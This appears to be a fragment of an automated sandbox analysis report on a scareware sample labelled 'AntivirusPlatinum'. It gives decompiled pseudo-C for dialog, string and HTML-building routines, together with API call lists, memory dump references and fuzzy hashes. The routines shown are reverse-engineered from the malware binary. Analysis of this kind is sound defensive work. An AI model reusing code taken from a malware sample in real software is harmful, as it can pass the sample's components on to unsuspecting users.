                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 749574446-0
                                                                                                                                                              • Opcode ID: 8026bc820de6d862ce91a14b57fdf5da722ddd537d77b2a53211bf6da7feec6e
                                                                                                                                                              • Instruction ID: 14793ef18abff2b128ca596471c817456f9129885f12b962b2fa9b3f18b83a8b
                                                                                                                                                              • Opcode Fuzzy Hash: 8026bc820de6d862ce91a14b57fdf5da722ddd537d77b2a53211bf6da7feec6e
                                                                                                                                                              • Instruction Fuzzy Hash: 73B011300A000AAA8E002F30CE088203A20EA2330A300C2B0A002C82A0CB22C023AB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406EF6(signed char _a4, char _a8) {
                                                                                                                                                              				CHAR* _t3;
                                                                                                                                                              				CHAR* _t4;
                                                                                                                                                              
                                                                                                                                                              				_t3 = _a4 & 0x000000ff;
                                                                                                                                                              				if(_a8 == 0) {
                                                                                                                                                              					_t4 = CharUpperA(_t3); // executed
                                                                                                                                                              					return _t4;
                                                                                                                                                              				}
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}





                                                                                                                                                              0x00406efb
                                                                                                                                                              0x00406f00
                                                                                                                                                              0x00406f03
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406f03
                                                                                                                                                              0x00406f09

                                                                                                                                                              APIs
                                                                                                                                                              • CharUpperA.USER32(?,00406F65,00000000,?,00000000,00000000,?,?,004071B6,00000000,00000000,00000000,__rar_,00000000,00000006,?), ref: 00406F03
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharUpper
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 9403516-0
                                                                                                                                                              • Opcode ID: 6bbc7cc59114ae65e0fe357eeee9f6236295800aaef3f650eca08f95825268fc
                                                                                                                                                              • Instruction ID: 10a890fd1d11d5ae954edd159976ce38f528880547e9b8c490f3023850044f8b
                                                                                                                                                              • Opcode Fuzzy Hash: 6bbc7cc59114ae65e0fe357eeee9f6236295800aaef3f650eca08f95825268fc
                                                                                                                                                              • Instruction Fuzzy Hash: 41B092A080C29129EB02A320961C72BBE942BA1301F16C89AF0D591092D1BCC524DB6D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E0040AE97(void* __ecx, void* __edx) {
                                                                                                                                                              				void* _t67;
                                                                                                                                                              				void* _t80;
                                                                                                                                                              				int _t82;
                                                                                                                                                              				signed int _t124;
                                                                                                                                                              				void* _t142;
                                                                                                                                                              				struct HICON__* _t143;
                                                                                                                                                              				void* _t146;
                                                                                                                                                              				void* _t147;
                                                                                                                                                              				void* _t148;
                                                                                                                                                              				void* _t149;
                                                                                                                                                              				void* _t150;
                                                                                                                                                              				void* _t156;
                                                                                                                                                              				signed int _t157;
                                                                                                                                                              				struct HWND__* _t163;
                                                                                                                                                              				void* _t171;
                                                                                                                                                              				void* _t173;
                                                                                                                                                              				void* _t174;
                                                                                                                                                              				void* _t176;
                                                                                                                                                              
                                                                                                                                                              				_t158 = __edx;
                                                                                                                                                              				_t156 = __ecx;
                                                                                                                                                              				_t171 = _t173 - 0x68;
                                                                                                                                                              				_t174 = _t173 - 0x95c;
                                                                                                                                                              				_t163 =  *(_t171 + 0x70);
                                                                                                                                                              				E0040309D(__edx, _t163,  *(_t171 + 0x74),  *(_t171 + 0x78),  *((intOrPtr*)(_t171 + 0x7c)), "REPLACEFILEDLG", 0, 0);
                                                                                                                                                              				_t67 =  *(_t171 + 0x74) - 0x110;
                                                                                                                                                              				if(_t67 == 0) {
                                                                                                                                                              					E0040A4AB(_t171 - 0x8f4,  *((intOrPtr*)(_t171 + 0x7c)), 0x3ff);
                                                                                                                                                              					_push(0x400);
                                                                                                                                                              					 *((char*)(_t171 - 0x4f5)) = 0;
                                                                                                                                                              					E00407A16(_t156, _t171 - 0x8f4, 0);
                                                                                                                                                              					SetDlgItemTextA(_t163, 0x65, _t171 - 0x8f4);
                                                                                                                                                              					SHGetFileInfoA(_t171 - 0x8f4, 0, _t171 - 0x4f4, 0x160, 0x100);
                                                                                                                                                              					SendDlgItemMessageA( *(_t171 + 0x70), 0x66, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                              					_t80 = FindFirstFileA(_t171 - 0x8f4, _t171 - 0x194);
                                                                                                                                                              					 *(_t171 + 0x74) = _t80;
                                                                                                                                                              					if(_t80 != 0xffffffff) {
                                                                                                                                                              						FileTimeToLocalFileTime(_t171 - 0x180, _t171 + 0x48);
                                                                                                                                                              						FileTimeToSystemTime(_t171 + 0x48, _t171 + 0x58);
                                                                                                                                                              						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                              						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                              						wsprintfA(_t171 - 0x394, "%s %s %s", E004098F7(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                              						_t176 = _t174 + 0x14;
                                                                                                                                                              						SetDlgItemTextA( *(_t171 + 0x70), 0x6a, _t171 - 0x394);
                                                                                                                                                              						FindClose( *(_t171 + 0x74));
                                                                                                                                                              						if(( *(_t171 - 0x194) & 0x00000010) == 0) {
                                                                                                                                                              							E0040A88B(_t156, _t158,  *((intOrPtr*)(_t171 - 0x174)), 0, _t171 - 0x54, 0x32);
                                                                                                                                                              							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098F7(0x80));
                                                                                                                                                              							_t176 = _t176 + 0x10;
                                                                                                                                                              							SetDlgItemTextA( *(_t171 + 0x70), 0x68, _t171 - 0x394);
                                                                                                                                                              						}
                                                                                                                                                              						SendDlgItemMessageA( *(_t171 + 0x70), 0x67, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                              						DosDateTimeToFileTime( *0x419eda & 0x0000ffff,  *0x419ed8 & 0x0000ffff, _t171 + 0x50);
                                                                                                                                                              						FileTimeToSystemTime(_t171 + 0x50, _t171 + 0x58);
                                                                                                                                                              						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                              						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                              						wsprintfA(_t171 - 0x394, "%s %s %s", E004098F7(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                              						SetDlgItemTextA( *(_t171 + 0x70), 0x6b, _t171 - 0x394);
                                                                                                                                                              						_t124 =  *0x419ee4; // 0x0
                                                                                                                                                              						_t157 =  *0x419ee0; // 0x0
                                                                                                                                                              						if(( *(_t171 - 0x194) & 0x00000010) == 0 || (_t157 | _t124) != 0) {
                                                                                                                                                              							E0040A88B(_t157, _t171 - 0x54, _t157, _t124, _t171 - 0x54, 0x32);
                                                                                                                                                              							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098F7(0x80));
                                                                                                                                                              							SetDlgItemTextA( *(_t171 + 0x70), 0x69, _t171 - 0x394);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L25:
                                                                                                                                                              					_t82 = 1;
                                                                                                                                                              					L26:
                                                                                                                                                              					return _t82;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t67 != 1) {
                                                                                                                                                              					L9:
                                                                                                                                                              					_t82 = 0;
                                                                                                                                                              					goto L26;
                                                                                                                                                              				}
                                                                                                                                                              				_push(2);
                                                                                                                                                              				_pop(1);
                                                                                                                                                              				_t142 = ( *(_t171 + 0x78) & 0x0000ffff) - 1;
                                                                                                                                                              				if(_t142 == 0) {
                                                                                                                                                              					L14:
                                                                                                                                                              					_push(5);
                                                                                                                                                              					L15:
                                                                                                                                                              					_pop(1);
                                                                                                                                                              					L16:
                                                                                                                                                              					_t143 = SendDlgItemMessageA(_t163, 0x66, 0x171, 0, 0);
                                                                                                                                                              					if(_t143 != 0) {
                                                                                                                                                              						DestroyIcon(_t143);
                                                                                                                                                              					}
                                                                                                                                                              					EndDialog(_t163, 1);
                                                                                                                                                              					goto L25;
                                                                                                                                                              				}
                                                                                                                                                              				_t146 = _t142 - 0x6a;
                                                                                                                                                              				if(_t146 == 0) {
                                                                                                                                                              					goto L16;
                                                                                                                                                              				}
                                                                                                                                                              				_t147 = _t146 - 1;
                                                                                                                                                              				if(_t147 == 0) {
                                                                                                                                                              					goto L16;
                                                                                                                                                              				}
                                                                                                                                                              				_t148 = _t147 - 1;
                                                                                                                                                              				if(_t148 == 0) {
                                                                                                                                                              					_push(4);
                                                                                                                                                              					goto L15;
                                                                                                                                                              				}
                                                                                                                                                              				_t149 = _t148 - 1;
                                                                                                                                                              				if(_t149 == 0) {
                                                                                                                                                              					_push(3);
                                                                                                                                                              					goto L15;
                                                                                                                                                              				}
                                                                                                                                                              				_t150 = _t149 - 1;
                                                                                                                                                              				if(_t150 == 0) {
                                                                                                                                                              					_push(6);
                                                                                                                                                              					goto L15;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t150 == 1) {
                                                                                                                                                              					goto L14;
                                                                                                                                                              				}
                                                                                                                                                              				goto L9;
                                                                                                                                                              			}





















                                                                                                                                                              0x0040ae97
                                                                                                                                                              0x0040ae97
                                                                                                                                                              0x0040ae98
                                                                                                                                                              0x0040ae9c
                                                                                                                                                              0x0040aea5
                                                                                                                                                              0x0040aebb
                                                                                                                                                              0x0040aec3
                                                                                                                                                              0x0040aec8
                                                                                                                                                              0x0040af3e
                                                                                                                                                              0x0040af48
                                                                                                                                                              0x0040af51
                                                                                                                                                              0x0040af57
                                                                                                                                                              0x0040af6c
                                                                                                                                                              0x0040af87
                                                                                                                                                              0x0040af9e
                                                                                                                                                              0x0040afb2
                                                                                                                                                              0x0040afb8
                                                                                                                                                              0x0040afbe
                                                                                                                                                              0x0040afcf
                                                                                                                                                              0x0040afdd
                                                                                                                                                              0x0040aff1
                                                                                                                                                              0x0040b004
                                                                                                                                                              0x0040b02f
                                                                                                                                                              0x0040b031
                                                                                                                                                              0x0040b040
                                                                                                                                                              0x0040b045
                                                                                                                                                              0x0040b052
                                                                                                                                                              0x0040b062
                                                                                                                                                              0x0040b082
                                                                                                                                                              0x0040b084
                                                                                                                                                              0x0040b093
                                                                                                                                                              0x0040b093
                                                                                                                                                              0x0040b0a7
                                                                                                                                                              0x0040b0c1
                                                                                                                                                              0x0040b0cf
                                                                                                                                                              0x0040b0e4
                                                                                                                                                              0x0040b0f9
                                                                                                                                                              0x0040b11e
                                                                                                                                                              0x0040b12f
                                                                                                                                                              0x0040b138
                                                                                                                                                              0x0040b13d
                                                                                                                                                              0x0040b143
                                                                                                                                                              0x0040b153
                                                                                                                                                              0x0040b173
                                                                                                                                                              0x0040b184
                                                                                                                                                              0x0040b184
                                                                                                                                                              0x0040b143
                                                                                                                                                              0x0040b186
                                                                                                                                                              0x0040b188
                                                                                                                                                              0x0040b189
                                                                                                                                                              0x0040b190
                                                                                                                                                              0x0040b190
                                                                                                                                                              0x0040aecb
                                                                                                                                                              0x0040aeec
                                                                                                                                                              0x0040aeec
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040aeec
                                                                                                                                                              0x0040aed1
                                                                                                                                                              0x0040aed3
                                                                                                                                                              0x0040aed4
                                                                                                                                                              0x0040aed6
                                                                                                                                                              0x0040af04
                                                                                                                                                              0x0040af04
                                                                                                                                                              0x0040af06
                                                                                                                                                              0x0040af06
                                                                                                                                                              0x0040af07
                                                                                                                                                              0x0040af11
                                                                                                                                                              0x0040af19
                                                                                                                                                              0x0040af1c
                                                                                                                                                              0x0040af1c
                                                                                                                                                              0x0040af24
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040af24
                                                                                                                                                              0x0040aed8
                                                                                                                                                              0x0040aedb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040af01
                                                                                                                                                              0x0040aedd
                                                                                                                                                              0x0040aede
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040aee0
                                                                                                                                                              0x0040aee1
                                                                                                                                                              0x0040aefb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040aefb
                                                                                                                                                              0x0040aee3
                                                                                                                                                              0x0040aee4
                                                                                                                                                              0x0040aef7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040aef7
                                                                                                                                                              0x0040aee6
                                                                                                                                                              0x0040aee7
                                                                                                                                                              0x0040aef3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040aef3
                                                                                                                                                              0x0040aeea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000066,00000171,00000000,00000000), ref: 0040AF11
                                                                                                                                                              • DestroyIcon.USER32(00000000), ref: 0040AF1C
                                                                                                                                                              • EndDialog.USER32(?,00000005), ref: 0040AF24
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040AF6C
                                                                                                                                                              • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000100), ref: 0040AF87
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000066,00000170,?,00000000), ref: 0040AF9E
                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040AFB2
                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040AFCF
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AFDD
                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040AFF1
                                                                                                                                                              • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B004
                                                                                                                                                              • wsprintfA.USER32 ref: 0040B02F
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040B040
                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0040B045
                                                                                                                                                              • wsprintfA.USER32 ref: 0040B082
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040B093
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000067,00000170,?,00000000), ref: 0040B0A7
                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0040B0C1
                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040B0CF
                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040B0E4
                                                                                                                                                              • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B0F9
                                                                                                                                                              • wsprintfA.USER32 ref: 0040B11E
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040B12F
                                                                                                                                                              • wsprintfA.USER32 ref: 0040B173
                                                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040B184
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$Item$File$Text$Formatwsprintf$DateMessageSend$FindSystem$CloseDestroyDialogFirstIconInfoLocal
                                                                                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                              • API String ID: 1296638866-1840816070
                                                                                                                                                              • Opcode ID: 81188f02349ff2494ade99b0fda97fe7a7c576c23cec11c941e2f9909fbb7495
                                                                                                                                                              • Instruction ID: b8757001107efa6af174484403e24566bff63b119f9254fdcbc402ae20e3f96d
                                                                                                                                                              • Opcode Fuzzy Hash: 81188f02349ff2494ade99b0fda97fe7a7c576c23cec11c941e2f9909fbb7495
                                                                                                                                                              • Instruction Fuzzy Hash: 3F912E7254021DBBEB21DFA0CD85FEB37ACEB08740F044172BB05E50D1DAB99A658B69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E00406860(intOrPtr __ecx) {
                                                                                                                                                              				char* _t48;
                                                                                                                                                              				short* _t55;
                                                                                                                                                              				signed int _t56;
                                                                                                                                                              				char _t58;
                                                                                                                                                              				short* _t59;
                                                                                                                                                              				char _t62;
                                                                                                                                                              				short* _t64;
                                                                                                                                                              				int _t65;
                                                                                                                                                              				intOrPtr _t83;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              				char* _t87;
                                                                                                                                                              				int _t94;
                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				void* _t98;
                                                                                                                                                              
                                                                                                                                                              				_t96 = _t98 - 0x74;
                                                                                                                                                              				_t48 =  *(__ecx + 0xc);
                                                                                                                                                              				 *((intOrPtr*)(_t96 + 0x60)) = __ecx;
                                                                                                                                                              				if(_t48 == 0) {
                                                                                                                                                              					L27:
                                                                                                                                                              					return _t48;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t96 + 0x64) = 0;
                                                                                                                                                              				 *((intOrPtr*)( *_t48 + 0x2c))(_t48, L"about:blank", 0, 0, 0, 0, _t86);
                                                                                                                                                              				_t83 = __ecx;
                                                                                                                                                              				 *((char*)(_t96 + 0x6b)) = E004065B9( *(_t96 + 0x7c));
                                                                                                                                                              				_t94 = 0x100 + lstrlenA( *(_t96 + 0x7c)) * 6;
                                                                                                                                                              				_t48 = GlobalAlloc(0x40, _t94);
                                                                                                                                                              				_t87 = _t48;
                                                                                                                                                              				if(_t87 == 0) {
                                                                                                                                                              					L26:
                                                                                                                                                              					goto L27;
                                                                                                                                                              				}
                                                                                                                                                              				 *(_t96 - 0x38) = 0x94;
                                                                                                                                                              				GetVersionExA(_t96 - 0x38);
                                                                                                                                                              				if( *((intOrPtr*)(_t96 - 0x28)) != 1) {
                                                                                                                                                              					L4:
                                                                                                                                                              					 *((char*)(_t96 + 0x73)) = 1;
                                                                                                                                                              					L5:
                                                                                                                                                              					E0040A477(_t87, "<html>");
                                                                                                                                                              					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                              						E0040A5E2(_t87, "<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                                                                                                                              						 *((intOrPtr*)(_t96 + 0x5c)) = E0040A384(_t83, _t87) + _t87;
                                                                                                                                                              						E0040A5E2(_t87, "utf-8\"></head>");
                                                                                                                                                              					}
                                                                                                                                                              					_t55 =  *(_t96 + 0x7c);
                                                                                                                                                              					 *(_t96 + 0x6c) = _t55;
                                                                                                                                                              					L9:
                                                                                                                                                              					if( *_t55 == 0x20) {
                                                                                                                                                              						 *(_t96 + 0x6c) =  &(( *(_t96 + 0x6c))[0]);
                                                                                                                                                              						_t55 =  *(_t96 + 0x6c);
                                                                                                                                                              						goto L9;
                                                                                                                                                              					}
                                                                                                                                                              					_t56 = E0040A5BD( *(_t96 + 0x6c), "<html>", 6);
                                                                                                                                                              					asm("sbb al, al");
                                                                                                                                                              					_t58 =  ~_t56 + 1;
                                                                                                                                                              					 *((char*)(_t96 + 0x6a)) = _t58;
                                                                                                                                                              					if(_t58 == 0) {
                                                                                                                                                              						_t59 =  *(_t96 + 0x7c);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t59 =  &(( *(_t96 + 0x6c))[3]);
                                                                                                                                                              					}
                                                                                                                                                              					E0040A5E2(_t87, _t59);
                                                                                                                                                              					if( *((intOrPtr*)(_t96 + 0x6a)) == 0) {
                                                                                                                                                              						E0040A5E2(_t87, "</html>");
                                                                                                                                                              					}
                                                                                                                                                              					if( *((intOrPtr*)(_t96 + 0x6b)) == 0) {
                                                                                                                                                              						E004065E9( *((intOrPtr*)(_t96 + 0x60)), _t87);
                                                                                                                                                              					}
                                                                                                                                                              					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                              						_t64 = E0040A1EC(_t94 + _t94);
                                                                                                                                                              						 *(_t96 + 0x6c) = _t64;
                                                                                                                                                              						if(_t64 != 0) {
                                                                                                                                                              							_t65 = MultiByteToWideChar(0, 0, _t87, 0xffffffff, _t64, _t94);
                                                                                                                                                              							_t32 =  &(_t87[3]); // 0x3
                                                                                                                                                              							 *((char*)(_t96 + 0x7f)) = _t65 != 0;
                                                                                                                                                              							if(WideCharToMultiByte(0xfde9, 0,  *(_t96 + 0x6c), 0xffffffff, _t32, _t94, 0, 0) == 0) {
                                                                                                                                                              								 *((char*)(_t96 + 0x7f)) = 0;
                                                                                                                                                              							}
                                                                                                                                                              							E0040A205( *(_t96 + 0x6c));
                                                                                                                                                              							if( *((intOrPtr*)(_t96 + 0x7f)) == 0) {
                                                                                                                                                              								 *((char*)( *((intOrPtr*)(_t96 + 0x5c)))) = 0x5f;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *_t87 = 0xef;
                                                                                                                                                              								_t87[1] = 0xbb;
                                                                                                                                                              								_t87[2] = 0xbf;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t48 = _t96 + 0x64;
                                                                                                                                                              					__imp__CreateStreamOnHGlobal(_t87, 1, _t48);
                                                                                                                                                              					if(_t48 >= 0) {
                                                                                                                                                              						_t95 =  *((intOrPtr*)(_t96 + 0x60));
                                                                                                                                                              						 *((char*)(_t95 + 0x15)) = E004064FD( *((intOrPtr*)(_t95 + 0xc)),  *(_t96 + 0x64));
                                                                                                                                                              						_t62 =  *(_t96 + 0x64);
                                                                                                                                                              						_t48 =  *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                              					}
                                                                                                                                                              					goto L26;
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(_t96 + 0x73)) = 0;
                                                                                                                                                              				if(( *(_t96 - 0x2c) & 0x0000ffff) < 0x7ce) {
                                                                                                                                                              					goto L5;
                                                                                                                                                              				}
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}


















                                                                                                                                                              0x00406861
                                                                                                                                                              0x0040686f
                                                                                                                                                              0x00406874
                                                                                                                                                              0x00406879
                                                                                                                                                              0x00406a10
                                                                                                                                                              0x00406a16
                                                                                                                                                              0x00406a16
                                                                                                                                                              0x00406889
                                                                                                                                                              0x0040688f
                                                                                                                                                              0x00406895
                                                                                                                                                              0x0040689f
                                                                                                                                                              0x004068ad
                                                                                                                                                              0x004068b6
                                                                                                                                                              0x004068bc
                                                                                                                                                              0x004068c0
                                                                                                                                                              0x00406a0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406a0f
                                                                                                                                                              0x004068ca
                                                                                                                                                              0x004068d1
                                                                                                                                                              0x004068db
                                                                                                                                                              0x004068eb
                                                                                                                                                              0x004068eb
                                                                                                                                                              0x004068ef
                                                                                                                                                              0x004068f5
                                                                                                                                                              0x004068fd
                                                                                                                                                              0x00406905
                                                                                                                                                              0x00406918
                                                                                                                                                              0x0040691b
                                                                                                                                                              0x0040691b
                                                                                                                                                              0x00406920
                                                                                                                                                              0x00406923
                                                                                                                                                              0x0040692e
                                                                                                                                                              0x00406931
                                                                                                                                                              0x00406928
                                                                                                                                                              0x0040692b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040692b
                                                                                                                                                              0x0040693d
                                                                                                                                                              0x00406944
                                                                                                                                                              0x00406946
                                                                                                                                                              0x00406948
                                                                                                                                                              0x0040694b
                                                                                                                                                              0x00406955
                                                                                                                                                              0x0040694d
                                                                                                                                                              0x00406950
                                                                                                                                                              0x00406950
                                                                                                                                                              0x0040695a
                                                                                                                                                              0x00406962
                                                                                                                                                              0x0040696a
                                                                                                                                                              0x0040696a
                                                                                                                                                              0x00406972
                                                                                                                                                              0x00406978
                                                                                                                                                              0x00406978
                                                                                                                                                              0x00406980
                                                                                                                                                              0x00406986
                                                                                                                                                              0x0040698b
                                                                                                                                                              0x00406990
                                                                                                                                                              0x00406999
                                                                                                                                                              0x004069a4
                                                                                                                                                              0x004069ad
                                                                                                                                                              0x004069bf
                                                                                                                                                              0x004069c1
                                                                                                                                                              0x004069c1
                                                                                                                                                              0x004069c7
                                                                                                                                                              0x004069cf
                                                                                                                                                              0x004069e1
                                                                                                                                                              0x004069d1
                                                                                                                                                              0x004069d1
                                                                                                                                                              0x004069d4
                                                                                                                                                              0x004069d8
                                                                                                                                                              0x004069d8
                                                                                                                                                              0x004069cf
                                                                                                                                                              0x00406990
                                                                                                                                                              0x004069e4
                                                                                                                                                              0x004069eb
                                                                                                                                                              0x004069f3
                                                                                                                                                              0x004069f8
                                                                                                                                                              0x00406a03
                                                                                                                                                              0x00406a06
                                                                                                                                                              0x00406a0c
                                                                                                                                                              0x00406a0c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004069f3
                                                                                                                                                              0x004068e1
                                                                                                                                                              0x004068e9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(?,?), ref: 004068A2
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,-00000100), ref: 004068B6
                                                                                                                                                              • GetVersionExA.KERNEL32(?), ref: 004068D1
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,-00000100,00000000,00000000,?,?,<html>,00000006,00000000,<html>), ref: 00406999
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,000000FF,00000003,-00000100,00000000,00000000), ref: 004069B7
                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,00000000,?,?,<html>,00000006,00000000,<html>), ref: 004069EB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharGlobalMultiWide$AllocCreateStreamVersionlstrlen
                                                                                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$about:blank$utf-8"></head>
                                                                                                                                                              • API String ID: 918982468-1117646011
                                                                                                                                                              • Opcode ID: f4b66ca56256074701a77dfd2d7c8255339cab005059f91be7c8ef823ca1bce2
                                                                                                                                                              • Instruction ID: 5c5e2e41cef04153fcc374feb770f7bcd7630f055a3a5a69099902d12bd6b0ed
                                                                                                                                                              • Opcode Fuzzy Hash: f4b66ca56256074701a77dfd2d7c8255339cab005059f91be7c8ef823ca1bce2
                                                                                                                                                              • Instruction Fuzzy Hash: 22519571500388AEDB21EF748C45DAE7FA9AF06714F15412BF966A32D2C678CC24DB29
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
